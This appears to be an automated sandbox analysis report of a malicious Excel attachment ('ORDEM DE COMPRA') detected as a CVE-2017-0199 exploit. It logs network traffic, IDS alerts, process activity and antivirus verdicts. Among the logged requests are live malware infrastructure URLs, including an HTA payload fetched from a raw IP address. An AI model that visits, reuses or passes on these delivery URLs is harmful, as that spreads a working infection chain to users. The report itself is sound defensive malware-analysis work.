Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: Joe Sandbox ViewIP Address: 3.39.89.152 3.39.89.152
Source: Joe Sandbox ViewIP Address: 5.161.200.29 5.161.200.29
Source: Joe Sandbox ViewIP Address: 13.107.246.60 13.107.246.60
Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49701 -> 13.107.246.60:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49703 -> 13.107.246.60:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49704 -> 13.107.246.60:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49707 -> 13.107.246.60:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49705 -> 13.107.246.60:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49710 -> 13.107.246.60:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49709 -> 13.107.246.60:443
Source: global trafficHTTP traffic detected: GET /3vyHqs9?&hide=direful&pension=terrible&outcome=idiotic&ranch=famous&loafer HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: st3.proConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /TPaIk0mILV?&offence=funny&wrap=axiomatic&advertisement HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: link.saja.market
Source: global trafficHTTP traffic detected: GET /xampp/kcheck/nicebrazilpeopleskissingbestformylips.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 104.168.7.38
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /3vyHqs9?&hide=direful&pension=terrible&outcome=idiotic&ranch=famous&loafer HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: st3.proConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /TPaIk0mILV?&offence=funny&wrap=axiomatic&advertisement HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: link.saja.market
Source: global trafficHTTP traffic detected: GET /rules/excel.exe-Production-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120600v5s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/excel.exe-Production-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /xampp/kcheck/nicebrazilpeopleskissingbestformylips.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 104.168.7.38
Source: global trafficDNS traffic detected: DNS query: st3.pro
Source: global trafficDNS traffic detected: DNS query: link.saja.market
Source: global trafficDNS traffic detected: DNS query: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 12 Mar 2025 17:35:34 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25Content-Length: 298Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 31 2e 32 35 20 53 65 72 76 65 72 20 61 74 20 31 30 34 2e 31 36 38 2e 37 2e 33 38 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25 Server at 104.168.7.38 Port 80</address></body></html>
Source: ORDEM DE COMPRA.xla.xlsxString found in binary or memory: https://st3.pro/3vyHqs9?&hide=direful&pension=terrible&outcome=idiotic&ranch=famous&loafer
Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: unknownHTTPS traffic detected: 5.161.200.29:443 -> 192.168.2.7:49697 version: TLS 1.2
Source: unknownHTTPS traffic detected: 3.39.89.152:443 -> 192.168.2.7:49698 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.7:49707 version: TLS 1.2
Source: ORDEM DE COMPRA.xla.xlsxOLE indicator, VBA macros: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEWindow title found: microsoft excel okexcel cannot open the file 'ordem de compra.xla.xlsx' because the file format or file extension is not valid. verify that the file has not been corrupted and that the file extension matches the format of the file.
Source: classification engineClassification label: mal56.winXLSX@4/4@3/4
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\~$ORDEM DE COMPRA.xla.xlsxJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user~1\AppData\Local\Temp\{29FD9E25-93BD-42EF-AA10-E5AB8BEE78A0} - OProcSessId.datJump to behavior
Source: ORDEM DE COMPRA.xla.xlsxOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: ORDEM DE COMPRA.xla.xlsxVirustotal: Detection: 25%
Source: ORDEM DE COMPRA.xla.xlsxReversingLabs: Detection: 36%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\ORDEM DE COMPRA.xla.xlsx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3EE60F5C-9BAD-4CD8-8E21-AD2D001D06EB}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: ORDEM DE COMPRA.xla.xlsxStatic file information: File size 1308160 > 1048576
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: ORDEM DE COMPRA.xla.xlsxInitial sample: OLE indicators encrypted = True
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: ORDEM DE COMPRA.xla.xlsxStream path 'MBD00B81574/Package' entropy: 7.99604029932 (max. 8.0)
Source: ORDEM DE COMPRA.xla.xlsxStream path 'Workbook' entropy: 7.97178680564 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 883Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts3
Exploitation for Client Execution
1
Scripting
1
Process Injection
2
Masquerading
OS Credential Dumping1
Process Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media3
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture14
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
ORDEM DE COMPRA.xla.xlsx25%VirustotalBrowse
ORDEM DE COMPRA.xla.xlsx37%ReversingLabsDocument-Excel.Exploit.CVE-2017-0199
ORDEM DE COMPRA.xla.xlsx100%AviraW97M/AVI.Agent.qeoql
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://st3.pro/3vyHqs9?&hide=direful&pension=terrible&outcome=idiotic&ranch=famous&loafer0%Avira URL Cloudsafe
https://link.saja.market/TPaIk0mILV?&offence=funny&wrap=axiomatic&advertisement0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.214.172
truefalse
    high
    st3.pro
    5.161.200.29
    truefalse
      high
      s-0005.dual-s-msedge.net
      52.123.129.14
      truefalse
        high
        service-eks-nlb-public-0b7cb0a32741e125.elb.ap-northeast-2.amazonaws.com
        3.39.89.152
        truefalse
          high
          s-part-0032.t-0009.t-msedge.net
          13.107.246.60
          truefalse
            high
            otelrules.svc.static.microsoft
            unknown
            unknownfalse
              high
              link.saja.market
              unknown
              unknownfalse
                high
                NameMaliciousAntivirus DetectionReputation
                https://otelrules.svc.static.microsoft/rules/excel.exe-Production-v19.bundlefalse
                  high
                  https://otelrules.svc.static.microsoft/rules/rule120610v0s19.xmlfalse
                    high
                    https://otelrules.svc.static.microsoft/rules/rule120600v5s19.xmlfalse
                      high
                      https://st3.pro/3vyHqs9?&hide=direful&pension=terrible&outcome=idiotic&ranch=famous&loaferfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://otelrules.svc.static.microsoft/rules/rule120607v1s19.xmlfalse
                        high
                        https://otelrules.svc.static.microsoft/rules/rule120609v0s19.xmlfalse
                          high
                          https://otelrules.svc.static.microsoft/rules/rule120603v8s19.xmlfalse
                            high
                            https://link.saja.market/TPaIk0mILV?&offence=funny&wrap=axiomatic&advertisementfalse
                            • Avira URL Cloud: safe
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            3.39.89.152
                            service-eks-nlb-public-0b7cb0a32741e125.elb.ap-northeast-2.amazonaws.comUnited States
